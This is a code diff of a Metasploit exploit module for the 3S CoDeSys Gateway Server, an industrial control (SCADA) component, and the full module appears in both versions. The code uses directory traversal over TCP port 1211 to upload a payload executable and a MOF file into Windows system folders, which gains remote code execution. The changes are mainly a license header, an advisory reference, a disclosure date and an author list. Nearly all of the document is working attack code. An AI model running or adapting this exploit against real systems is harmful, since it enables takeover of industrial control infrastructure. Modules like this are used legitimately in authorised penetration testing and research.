|
1 | | -#!/usr/bin/env ruby |
2 | | - |
| 1 | +## |
| 2 | +# This file is part of the Metasploit Framework and may be subject to |
| 3 | +# redistribution and commercial restrictions. Please see the Metasploit |
| 4 | +# web site for more information on licensing and terms of use. |
| 5 | +# http://metasploit.com |
| 6 | +## |
3 | 7 | require 'msf/core' |
4 | 8 | class Metasploit3 < Msf::Exploit::Remote |
5 | | - |
6 | | - Rank = ExcellentRanking |
7 | | - include Msf::Exploit::EXE |
8 | | - include Msf::Exploit::FileDropper |
9 | | - include Msf::Exploit::Remote::Tcp |
10 | | - include Msf::Exploit::WbemExec |
11 | | - |
12 | | - def initialize(info = {}) |
13 | | - super(update_info(info, |
14 | | - 'Name' => 'SCADA 3S CoDeSys Gateway Server Remote Execution', |
15 | | - 'Description' => %q{ |
16 | | - This module exploits arbitrary file creation to execute a mof file |
17 | | - gaining remote execution within the SCADA system |
18 | | - }, |
19 | | - 'Author' => |
20 | | - [ |
21 | | - 'Aaron Portnoy <[email protected]>', |
22 | | - 'Enrique Sanchez <[email protected]>' |
23 | | - ], |
24 | | - 'License' => 'MSF_LICENSE', |
25 | | - 'References' => |
26 | | - [ |
27 | | - ['Exodus Intel Training', '02-2013'] |
28 | | - ], |
29 | | - 'Platform' => 'win', |
30 | | - 'Targets' => |
31 | | - [ |
32 | | - ['Windows Universal', { }] |
33 | | - ], |
34 | | - 'DefaultTarget' => 0 |
35 | | - )) |
36 | | - |
37 | | - register_options( |
38 | | - [ |
39 | | - Opt::RPORT(1211), |
40 | | - ], self.class |
41 | | - ) |
42 | | - end |
43 | | - |
44 | | - def check |
45 | | - return Exploit::CheckCode::Vulnerable |
46 | | - end |
47 | | - |
48 | | - ## |
49 | | - # upload_file(remote_filepath, remote_filename, local_filedata) |
50 | | - # |
51 | | - # remote_filepath: Remote filepath where the file will be uploaded |
52 | | - # remote_filename: Remote name of the file to be executed ie. boot.ini |
53 | | - # local_file: File containing the read data for the local file to be uploaded, actual open/read/close done in exploit() |
54 | | - |
55 | | - def upload_file(remote_filepath, remote_filename, local_filedata = null) |
56 | | - magic_code = "\xdd\xdd" |
57 | | - opcode = [6].pack('L') |
58 | | - |
59 | | - # We create the filepath for the upload, for execution it should be \windows\system32\wbem\mof\<file with extension mof! |
60 | | - file = "..\\..\\" << remote_filepath << remote_filename << "\x00" |
61 | | - print_debug("File to upload: #{file}") |
62 | | - pkt_size = local_filedata.size() + file.size() + (0x108 - file.size()) + 4 |
63 | | - print_debug(pkt_size) |
64 | | - |
65 | | - # Magic_code + packing + size |
66 | | - pkt = magic_code << "AAAAAAAAAAAA" << [pkt_size].pack('L') |
67 | | - |
68 | | - tmp_pkt = opcode << file |
69 | | - tmp_pkt += "\x00"*(0x108 - tmp_pkt.size) << [local_filedata.size].pack('L') << local_filedata |
70 | | - pkt << tmp_pkt |
71 | | - |
72 | | - print_status("Starting upload of file #{remote_filename}") |
73 | | - connect |
74 | | - sock.put(pkt) |
75 | | - disconnect |
76 | | - |
77 | | - print_status("File uploaded") |
78 | | - end |
79 | | - |
80 | | - def remove_file |
81 | | - end |
82 | | - |
83 | | - def read_file |
84 | | - end |
85 | | - |
86 | | - def exploit |
87 | | - print_status("- Attempting to communicate with SCADA system #{rhost} on port #{rport}") |
88 | | - |
89 | | - # We create an exe payload, we have to get remote execution in 2 steps |
90 | | - exe = generate_payload_exe |
91 | | - exe_name = Rex::Text::rand_text_alpha(8) + ".exe" |
92 | | - upload_file("windows\\system32\\", exe_name, exe) |
93 | | - |
94 | | - # We create the mof file and upload (second step) |
95 | | - mof_name = Rex::Text::rand_text_alpha(8) + ".mof" |
96 | | - mof = generate_mof(mof_name, exe_name) |
97 | | - upload_file("WINDOWS\\system32\\wbem\\mof\\", mof_name, mof) |
98 | | - |
99 | | - print_status("Everything is ready, waiting for a session ... ") |
100 | | - handler |
101 | | - |
102 | | - #Taken from the spooler exploit writen byt jduck and HDMoore |
103 | | - cnt = 1 |
104 | | - while session_created? == false and cnt < 25 |
105 | | - ::IO.select(nil, nil, nil, 0.25) |
106 | | - cnt += 1 |
107 | | - end |
108 | | - end |
| 9 | + |
| 10 | + Rank = ExcellentRanking |
| 11 | + include Msf::Exploit::EXE |
| 12 | + include Msf::Exploit::FileDropper |
| 13 | + include Msf::Exploit::Remote::Tcp |
| 14 | + include Msf::Exploit::WbemExec |
| 15 | + |
| 16 | + def initialize(info = {}) |
| 17 | + super(update_info(info, |
| 18 | + 'Name' => 'SCADA 3S CoDeSys Gateway Server Remote Execution', |
| 19 | + 'Description' => %q{ |
| 20 | + This module exploits arbitrary file creation to execute a mof file |
| 21 | + gaining remote execution within the SCADA system |
| 22 | + }, |
| 23 | + 'Author' => |
| 24 | + [ |
| 25 | + 'Enrique Sanchez <[email protected]>' |
| 26 | + ], |
| 27 | + 'License' => 'MSF_LICENSE', |
| 28 | + 'References' => |
| 29 | + [ |
| 30 | + ['ICSA-13-050-01', '02-19-2013'] |
| 31 | + ], |
| 32 | + 'DisclosureDate' => 'Feb 02 2013', |
| 33 | + 'Platform' => 'win', |
| 34 | + 'Targets' => |
| 35 | + [ |
| 36 | + ['Windows Universal S3 CoDeSyS < 2.3.9.27', { }] |
| 37 | + ], |
| 38 | + 'DefaultTarget' => 0)) |
| 39 | + |
| 40 | + register_options( |
| 41 | + [ |
| 42 | + Opt::RPORT(1211), |
| 43 | + ], self.class) |
| 44 | + end |
| 45 | + |
| 46 | + def check |
| 47 | + return Exploit::CheckCode::Vulnerable |
| 48 | + end |
| 49 | + |
| 50 | + ## |
| 51 | + # upload_file(remote_filepath, remote_filename, local_filedata) |
| 52 | + # |
| 53 | + # remote_filepath: Remote filepath where the file will be uploaded |
| 54 | + # remote_filename: Remote name of the file to be executed ie. boot.ini |
| 55 | + # local_file: File containing the read data for the local file to be uploaded, actual open/read/close done in exploit() |
| 56 | + |
| 57 | + def upload_file(remote_filepath, remote_filename, local_filedata = null) |
| 58 | + magic_code = "\xdd\xdd" |
| 59 | + opcode = [6].pack('L') |
| 60 | + |
| 61 | + # We create the filepath for the upload, for execution it should be \windows\system32\wbem\mof\<file with extension mof! |
| 62 | + file = "..\\..\\" << remote_filepath << remote_filename << "\x00" |
| 63 | + print_debug("File to upload: #{file}") |
| 64 | + pkt_size = local_filedata.size() + file.size() + (0x108 - file.size()) + 4 |
| 65 | + print_debug(pkt_size) |
| 66 | + |
| 67 | + # Magic_code + packing + size |
| 68 | + pkt = magic_code << "AAAAAAAAAAAA" << [pkt_size].pack('L') |
| 69 | + |
| 70 | + tmp_pkt = opcode << file |
| 71 | + tmp_pkt += "\x00"*(0x108 - tmp_pkt.size) << [local_filedata.size].pack('L') << local_filedata |
| 72 | + pkt << tmp_pkt |
| 73 | + |
| 74 | + print_status("Starting upload of file #{remote_filename}") |
| 75 | + connect |
| 76 | + sock.put(pkt) |
| 77 | + disconnect |
| 78 | + |
| 79 | + print_status("File uploaded") |
| 80 | + end |
| 81 | + |
| 82 | + def exploit |
| 83 | + print_status("Attempting to communicate with SCADA system #{rhost} on port #{rport}") |
| 84 | + |
| 85 | + # We create an exe payload, we have to get remote execution in 2 steps |
| 86 | + exe = generate_payload_exe |
| 87 | + exe_name = Rex::Text::rand_text_alpha(8) + ".exe" |
| 88 | + upload_file("windows\\system32\\", exe_name, exe) |
| 89 | + |
| 90 | + # We create the mof file and upload (second step) |
| 91 | + mof_name = Rex::Text::rand_text_alpha(8) + ".mof" |
| 92 | + mof = generate_mof(mof_name, exe_name) |
| 93 | + upload_file("WINDOWS\\system32\\wbem\\mof\\", mof_name, mof) |
| 94 | + |
| 95 | + print_status("Everything is ready, waiting for a session ... ") |
| 96 | + handler |
| 97 | + |
| 98 | + #Taken from the spooler exploit writen byt jduck and HDMoore |
| 99 | + cnt = 1 |
| 100 | + while session_created? == false and cnt < 25 |
| 101 | + ::IO.select(nil, nil, nil, 0.25) |
| 102 | + cnt += 1 |
| 103 | + end |
| 104 | + end |
109 | 105 | end |
0 commit comments